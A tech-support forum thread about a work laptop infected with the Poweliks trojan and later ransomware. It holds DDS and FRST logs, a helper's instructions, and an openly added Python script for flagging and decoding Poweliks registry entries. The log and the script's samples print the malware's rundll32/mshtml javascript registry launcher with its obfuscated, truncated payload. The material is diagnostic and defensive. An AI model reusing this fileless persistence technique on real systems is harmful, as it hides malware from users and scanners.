Powelik Trojan - Computer scary slow and unresponsive


  • This topic is locked
71 replies to this topic

#1 Shate'

Shate'

  • Members
  • 72 posts
  • OFFLINE
  • Local time:09:31 PM

Posted 29 October 2014 - 11:53 AM

From previous First post in 'Am I Infected'

Initially attended to by Broni who escalated

 

"Hello All,

Nice to meet you.

 

I hope you can help me please with an excruciatingly annoying problem.

 

I have run:

Malwarebytes - found some stuff and deleted

Ran AdwCleaner - found nothing

Ran Symantec Endpoint - found nothing but keeps having popups of everything it is 'blocking', IP addresses etc...

Ran ComboFix - processes returned

Entered Safe Mode and ran RKill (didn't appear to work) and then MBam - as MBam reached the Registry to scan, the COM processes disappeared; after the Reg scan part was done and it entered the File part, processes all returned one by one....

Ran RKill again unsuccessfully

Ran Rogue Killer - appeared to have worked, it had discovered the Powelik in the registry section and supposedly it was deleted. I also had stopped all of the COM processes supposedly successfully.
Then when I came back in this morning, the processes were all back and taking up 79-98% of the memory.

 

Doing ANYTHING is very slow obviously.. so please bear with me.

 

Will someone please help?

Thank you."

 

 

At 12:15 attempted to run DDS; failed with 'The instruction at 0x28b7fff could not be...' and then the computer went to a grey screen

12:40  Tried again and after downloading, shut off wireless network button

 

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Professional
Boot Device: \Device\HarddiskVolume1
Install Date: 11/29/2011 8:12:07 AM
System Uptime: 10/29/2014 12:34:36 PM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0TMCVM
Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz | CPU 1 | 2601/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 233 GiB total, 188.726 GiB free.
D: is CDROM ()
.
==== Disabled Device Manager Items =============
.
Class GUID:
Description:
Device ID: ACPI\SMO8800\1
Manufacturer:
Name:
PNP Device ID: ACPI\SMO8800\1
Service:
.
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Cisco Systems VPN Adapter
Device ID: ROOT\NET\0000
Manufacturer: Cisco Systems
Name: Cisco Systems VPN Adapter
PNP Device ID: ROOT\NET\0000
Service: CVirtA
.
==== System Restore Points ===================
.
RP151: 10/8/2014 1:59:57 PM - Scheduled Checkpoint
RP152: 10/16/2014 12:00:56 PM - Windows Update
RP153: 10/16/2014 12:03:12 PM - Windows Update
RP154: 10/16/2014 12:03:56 PM - Windows Update
RP155: 10/16/2014 12:05:00 PM - Windows Update
RP156: 10/16/2014 12:05:50 PM - Windows Update
RP157: 10/16/2014 12:06:56 PM - Windows Update
RP158: 10/16/2014 12:09:58 PM - Windows Update
RP159: 10/16/2014 12:11:43 PM - Windows Update
RP160: 10/16/2014 12:13:56 PM - Windows Update
RP161: 10/17/2014 8:03:25 AM - Windows Update
RP162: 10/17/2014 9:01:47 AM - Windows Update
.
==== Image File Execution Options =============
.
.
==== Installed Programs ======================
.
.
==== End Of File ===========================
 

 

Again this is only with the network disabled. With it on, there are multiple COM Surrogate or Windows Explorer instances
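The symptoms in this post (a "Powelik" entry found in the registry, COM Surrogate/dllhost instances that come back after every cleanup, processes that die during a registry scan and return afterwards) are what Poweliks' registry-only persistence looks like: a CLSID LocalServer32 value that launches rundll32 with a javascript: URL through mshtml's RunHTMLApplication, with the script body obfuscated; the FRST log later in this thread shows such a value, and its quoted prefix is obfuscated by shifting each character code by one. As an added example, not part of this post or of any of the tools mentioned, here is a Python triage script that flags such entries in FRST-style registry output and decodes the shifted prefix for the analyst; the sample lines, SID and CLSID are constructed, and the assumption that the whole entry uses the same one-character shift is mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in the format of FRST's "Registry (Whitelisted)"
# section. The SID and CLSID are made up; the obfuscated eval() prefix is the
# one quoted in the thread's log, and the third line reproduces FRST's
# truncation note for long values.
SAMPLE_FRST_LINES = [
    r"HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [505720 2011-07-20] (Alps Electric Co., Ltd.)",
    r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\...\CLSID\{00000000-1111-2222-3333-444444444444}\localserver32: "
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds")',
    r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\...\CLSID\{00000000-1111-2222-3333-444444444444}\localserver32: "
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters).',
]

# A COM class whose LocalServer32 is rundll32 fed a javascript: URL: rundll32
# loads mshtml.dll and its RunHTMLApplication export runs the URL's script.
# The registry value is the whole payload, so file scanners find nothing and
# killing the dllhost.exe hosts only lasts until the class is instantiated again.
LAUNCHER_RE = re.compile(
    r"rundll32(?:\.exe)?\s+javascript:.*mshtml\s*,\s*RunHTMLApplication",
    re.IGNORECASE,
)
EVAL_RE = re.compile(r'eval\("([^"]*)', re.IGNORECASE)
TRUNCATION_RE = re.compile(r"\s*\(the data entry has \d+ more characters\)\.?\s*$")
SCRIPT_MARKERS = ("document.write", "<script", "eval(", "activexobject", "wscript.shell")


@dataclass
class Finding:
    key: str                        # registry key/value name as printed by FRST
    launcher: str                   # the rundll32 command line stored in the value
    decoded_prefix: Optional[str]   # decoded start of the eval() argument, if recognised


def unshift(text: str, shift: int = 1) -> str:
    """Undo a per-character code shift (the quoted sample is shifted by +1)."""
    return "".join(chr(ord(c) - shift) for c in text)


def decode_payload(obfuscated: str) -> Optional[str]:
    """Apply the shift and keep the result only if it reads like script, so an
    unrelated value is not reported as 'decoded' noise. Assumption (mine, not
    from the thread): the rest of the entry uses the same shift as its prefix."""
    candidate = unshift(obfuscated)
    lowered = candidate.lower()
    return candidate if any(m in lowered for m in SCRIPT_MARKERS) else None


def triage_line(line: str) -> Optional[Finding]:
    """Return a Finding for an FRST registry line that carries the launcher."""
    if not LAUNCHER_RE.search(line):
        return None
    key, _, value = line.partition(": ")
    decoded = None
    m = EVAL_RE.search(value)
    if m:
        decoded = decode_payload(TRUNCATION_RE.sub("", m.group(1)))
    return Finding(key=key, launcher=value, decoded_prefix=decoded)


def triage(lines: List[str]) -> List[Finding]:
    return [f for f in (triage_line(ln) for ln in lines) if f is not None]


def report(findings: List[Finding]) -> List[str]:
    """One human-readable entry per finding, for pasting into a ticket."""
    out = []
    for f in findings:
        what = f.decoded_prefix or "(payload not decoded with a +1 shift)"
        out.append(f"{f.key}\n    launcher : {f.launcher[:60]}...\n    decoded  : {what}")
    return out


if __name__ == "__main__":
    hits = triage(SAMPLE_FRST_LINES)
    print(f"{len(hits)} registry-resident script launcher(s) found")
    for entry in report(hits):
        print(entry)
```

The decoded prefix of the quoted sample reads `document.write('<script language=jscr`, which is all the analyst needs to confirm the value is a script launcher rather than a legitimate COM server.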





#2 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  • Local time:09:31 PM

Posted 30 October 2014 - 09:23 AM

Does someone please have some time to help me with this?



#3 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 01 November 2014 - 03:18 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will be working on your Malware issues; this may or may not solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

 

 

Regards,

Georgi




#4 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  • Local time:09:31 PM

Posted 01 November 2014 - 08:31 AM

Hi Georgi

Thank you so much for replying. The computer in question is for an end user at work, so I won't be back until Monday now. Can we please continue then?

Also, it has now been attacked by ransomware that encrypted all files. The IT Director does not want it on the network any longer. Is it possible to download these tools to a flash drive and perform the steps you request?

Thank you so much again for your reply and time!

Shate'

#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:31 AM

Posted 02 November 2014 - 10:36 AM

Hi Shate,

 

Thank you so much for replying. The computer in question is for an end user at work, so I won't be back until monday now. Can we please continue then?

 

Yes, of course. :)

 

Is it possible to download these tools to a flash drive and perform the steps you request?

 

Sure. However keep in mind to take some measures for your safety:

 

 

1. First make sure that you disable Autorun on your computer and the other computers in the network:

 

How to disable the Autorun functionality in Windows

 

2.1 It's a good idea to immunize the computer against future autorun threats.

You can download and run the following version of Panda USBVaccine

Click on the Vaccinate Computer button (It should now show a green checkmark and provide the confirmation Computer vaccinated) then close the tool. You can vaccinate your USB drive as well.

 

2.2. Another way is to use USBFix. You can download the tool from here...make sure that your flash drive is connected to the computer.

Run the tool, press Vaccinate and wait for the process to complete. This will vaccinate all of the drives on the computer (including the flash drive) against autorun threats. Next click on the Deletion button to scan and clean the flash drive for malware remnants (you can also open My Computer, right click on the flash drive's letter and scan it with your installed antivirus software from the context menu, without opening the USB stick until the scan guarantees the flash drive is completely clean), or, better, format it to be sure the flash drive is malware free (if you wish so). Keep in mind that if you format it you will need to re-apply the immunization described above.

 

3. Finally, if your antivirus software doesn't offer to scan removable media when it is plugged in (instead of scanning the flash drive by right-clicking on the flash drive letter), then you can install the following software - MCShield 3. It will monitor in real time for any threats that can spread via USB drives. The tool is light on system resources and it's compatible with the installed antivirus software.

 

Regards,

Georgi




#6 Shate'

Shate'
  • Topic Starter

  • Members
  • 72 posts
  • OFFLINE
  • Local time:09:31 PM

Posted 03 November 2014 - 12:37 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 02-11-2014
Ran by ScalaC (administrator) on NY01L209 on 03-11-2014 11:35:55
Running from C:\Users\scalac\Desktop
Loaded Profile: ScalaC (Available profiles: Administrator & ScalaC)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Cisco Systems, Inc.) C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe
(HP) C:\Windows\System32\HPSIsvc.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Smc.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
(Symantec Corporation) C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\wfcrun32.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [505720 2011-07-20] (Alps Electric Co., Ltd.)
HKLM\...\Run: [DtermSP30Auto] => C:\Windows\system32\wscript.exe //T:300 "C:\Program Files\NEC\SP350\StartupScript.js"
HKLM\...\Run: [ConnectionCenter] => C:\Program Files\Citrix\ICA Client\concentr.exe [309184 2012-03-28] (Citrix Systems, Inc.)
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%\System32\*.exe <====== ATTENTION
HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% <====== ATTENTION
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-19\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-20\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4826904 2014-10-29] (Piriform Ltd)
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-18\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-18\...\Winlogon: [Shell] C:\Windows\Explorer.exe [2616320 2011-02-25] (Microsoft Corporation) <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-19809612-450918713-1538882281-38475\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL (Symantec Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 10.33.32.34 10.33.32.190 4.2.2.2

FireFox:
========
FF ProfilePath: C:\Users\scalac\AppData\Roaming\Mozilla\Firefox\Profiles\izvhwsf0.default
FF Homepage: www.google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: OpenDownload² - C:\Users\scalac\AppData\Roaming\Mozilla\Firefox\Profiles\izvhwsf0.default\Extensions\{210249CE-F888-11DD-B868-4CB456D89593} [2014-10-23]
FF HKLM\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF
FF Extension: Symantec Vulnerability Protection - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF [2014-08-29]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AeXNSClient; C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe [2122144 2014-09-10] (Symantec Corporation)
S3 AltirisAgentProvider; C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe [634288 2014-09-10] (Symantec Corporation)
R2 CVPND; C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe [1528616 2010-09-27] (Cisco Systems, Inc.)
S4 O2FLASH; C:\Windows\system32\DRIVERS\o2flash.exe [72296 2010-02-10] (O2Micro International)
R2 SepMasterService; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-08-11] (Symantec Corporation)
R3 SmcService; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\Smc.exe [1746696 2014-08-11] (Symantec Corporation)
S3 SNAC; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\snac.exe [289136 2014-08-11] (Symantec Corporation)
S4 SP350.PriorityPolicer; C:\Program Files\NEC\SP350\PriorityPolicer.exe [58880 2012-03-14] (NEC Corporation) [File not signed]
S3 workfolderssvc; C:\Windows\system32\workfolderssvc.dll [1242112 2014-04-08] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-07-22] (ST Microelectronics)
R1 BHDrvx86; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx86.sys [1137368 2014-10-08] (Symantec Corporation)
R1 ccSettings_{27226ED0-B7A0-49E4-82DE-02FF10AC5C5A}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\ccSetx86.sys [134744 2014-08-11] (Symantec Corporation)
S3 CVirtA; C:\Windows\System32\DRIVERS\CVirtA.sys [5275 2007-01-18] (Cisco Systems, Inc.)
R2 CVPNDRVA; C:\Windows\system32\Drivers\CVPNDRVA.sys [308859 2010-09-27] (Cisco Systems, Inc.) [File not signed]
R3 DNE; C:\Windows\System32\DRIVERS\dne2000.sys [131984 2008-11-16] (Deterministic Networks, Inc.)
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-09-09] (Symantec Corporation)
R1 IDSVix86; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141031.011\IDSvix86.sys [395992 2014-10-24] (Symantec Corporation)
S3 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [75480 2014-10-30] (Malwarebytes Corporation)
R3 MEI; C:\Windows\System32\DRIVERS\HECI.sys [41088 2010-10-19] (Intel Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141102.024\NAVENG.SYS [95704 2014-10-22] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141102.024\NAVEX15.SYS [1636696 2014-10-22] (Symantec Corporation)
R3 O2MDRRDR; C:\Windows\System32\DRIVERS\O2MDRw7.sys [62440 2011-01-04] (O2Micro )
R3 O2SDJRDR; C:\Windows\System32\DRIVERS\o2sdjw7.sys [63976 2011-03-23] (O2Micro )
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SRTSP.SYS [657112 2014-08-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SRTSPX.SYS [32344 2014-08-11] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyDvCtrl32.sys [29216 2014-08-11] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMDS.SYS [367704 2014-08-11] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMEFA.SYS [936152 2014-08-11] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [142936 2014-08-28] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\Ironx86.SYS [175832 2014-08-11] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x86\SYMNETS.SYS [342232 2014-08-11] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [128096 2014-08-29] (Symantec Corporation)
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [37064 2013-01-10] (Anchorfree Inc.)
R1 Teefer2; C:\Windows\System32\DRIVERS\Teefer.sys [81824 2014-08-11] (Symantec Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-31] ()

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-03 11:35 - 2014-11-03 11:36 - 00014578 _____ () C:\Users\scalac\Desktop\FRST.txt
2014-11-03 11:35 - 2014-11-03 11:36 - 00000000 ____D () C:\FRST
2014-11-03 11:33 - 2014-11-03 11:34 - 01106432 _____ (Farbar) C:\Users\scalac\Desktop\FRST.exe
2014-10-30 20:14 - 2014-10-30 20:14 - 258747023 _____ () C:\Windows\MEMORY.DMP
2014-10-30 20:14 - 2014-10-30 20:14 - 00142048 _____ () C:\Windows\Minidump\103014-97687-01.dmp
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00008510 _____ () C:\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Downloads\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\scalac\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00004192 _____ () C:\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Downloads\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\scalac\Documents\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\Users\INSTALL_TOR.URL
2014-10-30 20:11 - 2014-10-30 20:11 - 00000268 _____ () C:\INSTALL_TOR.URL
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00008510 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-30 20:08 - 2014-10-30 20:08 - 00004192 _____ () C:\Users\scalac\AppData\DECRYPT_INSTRUCTION.TXT
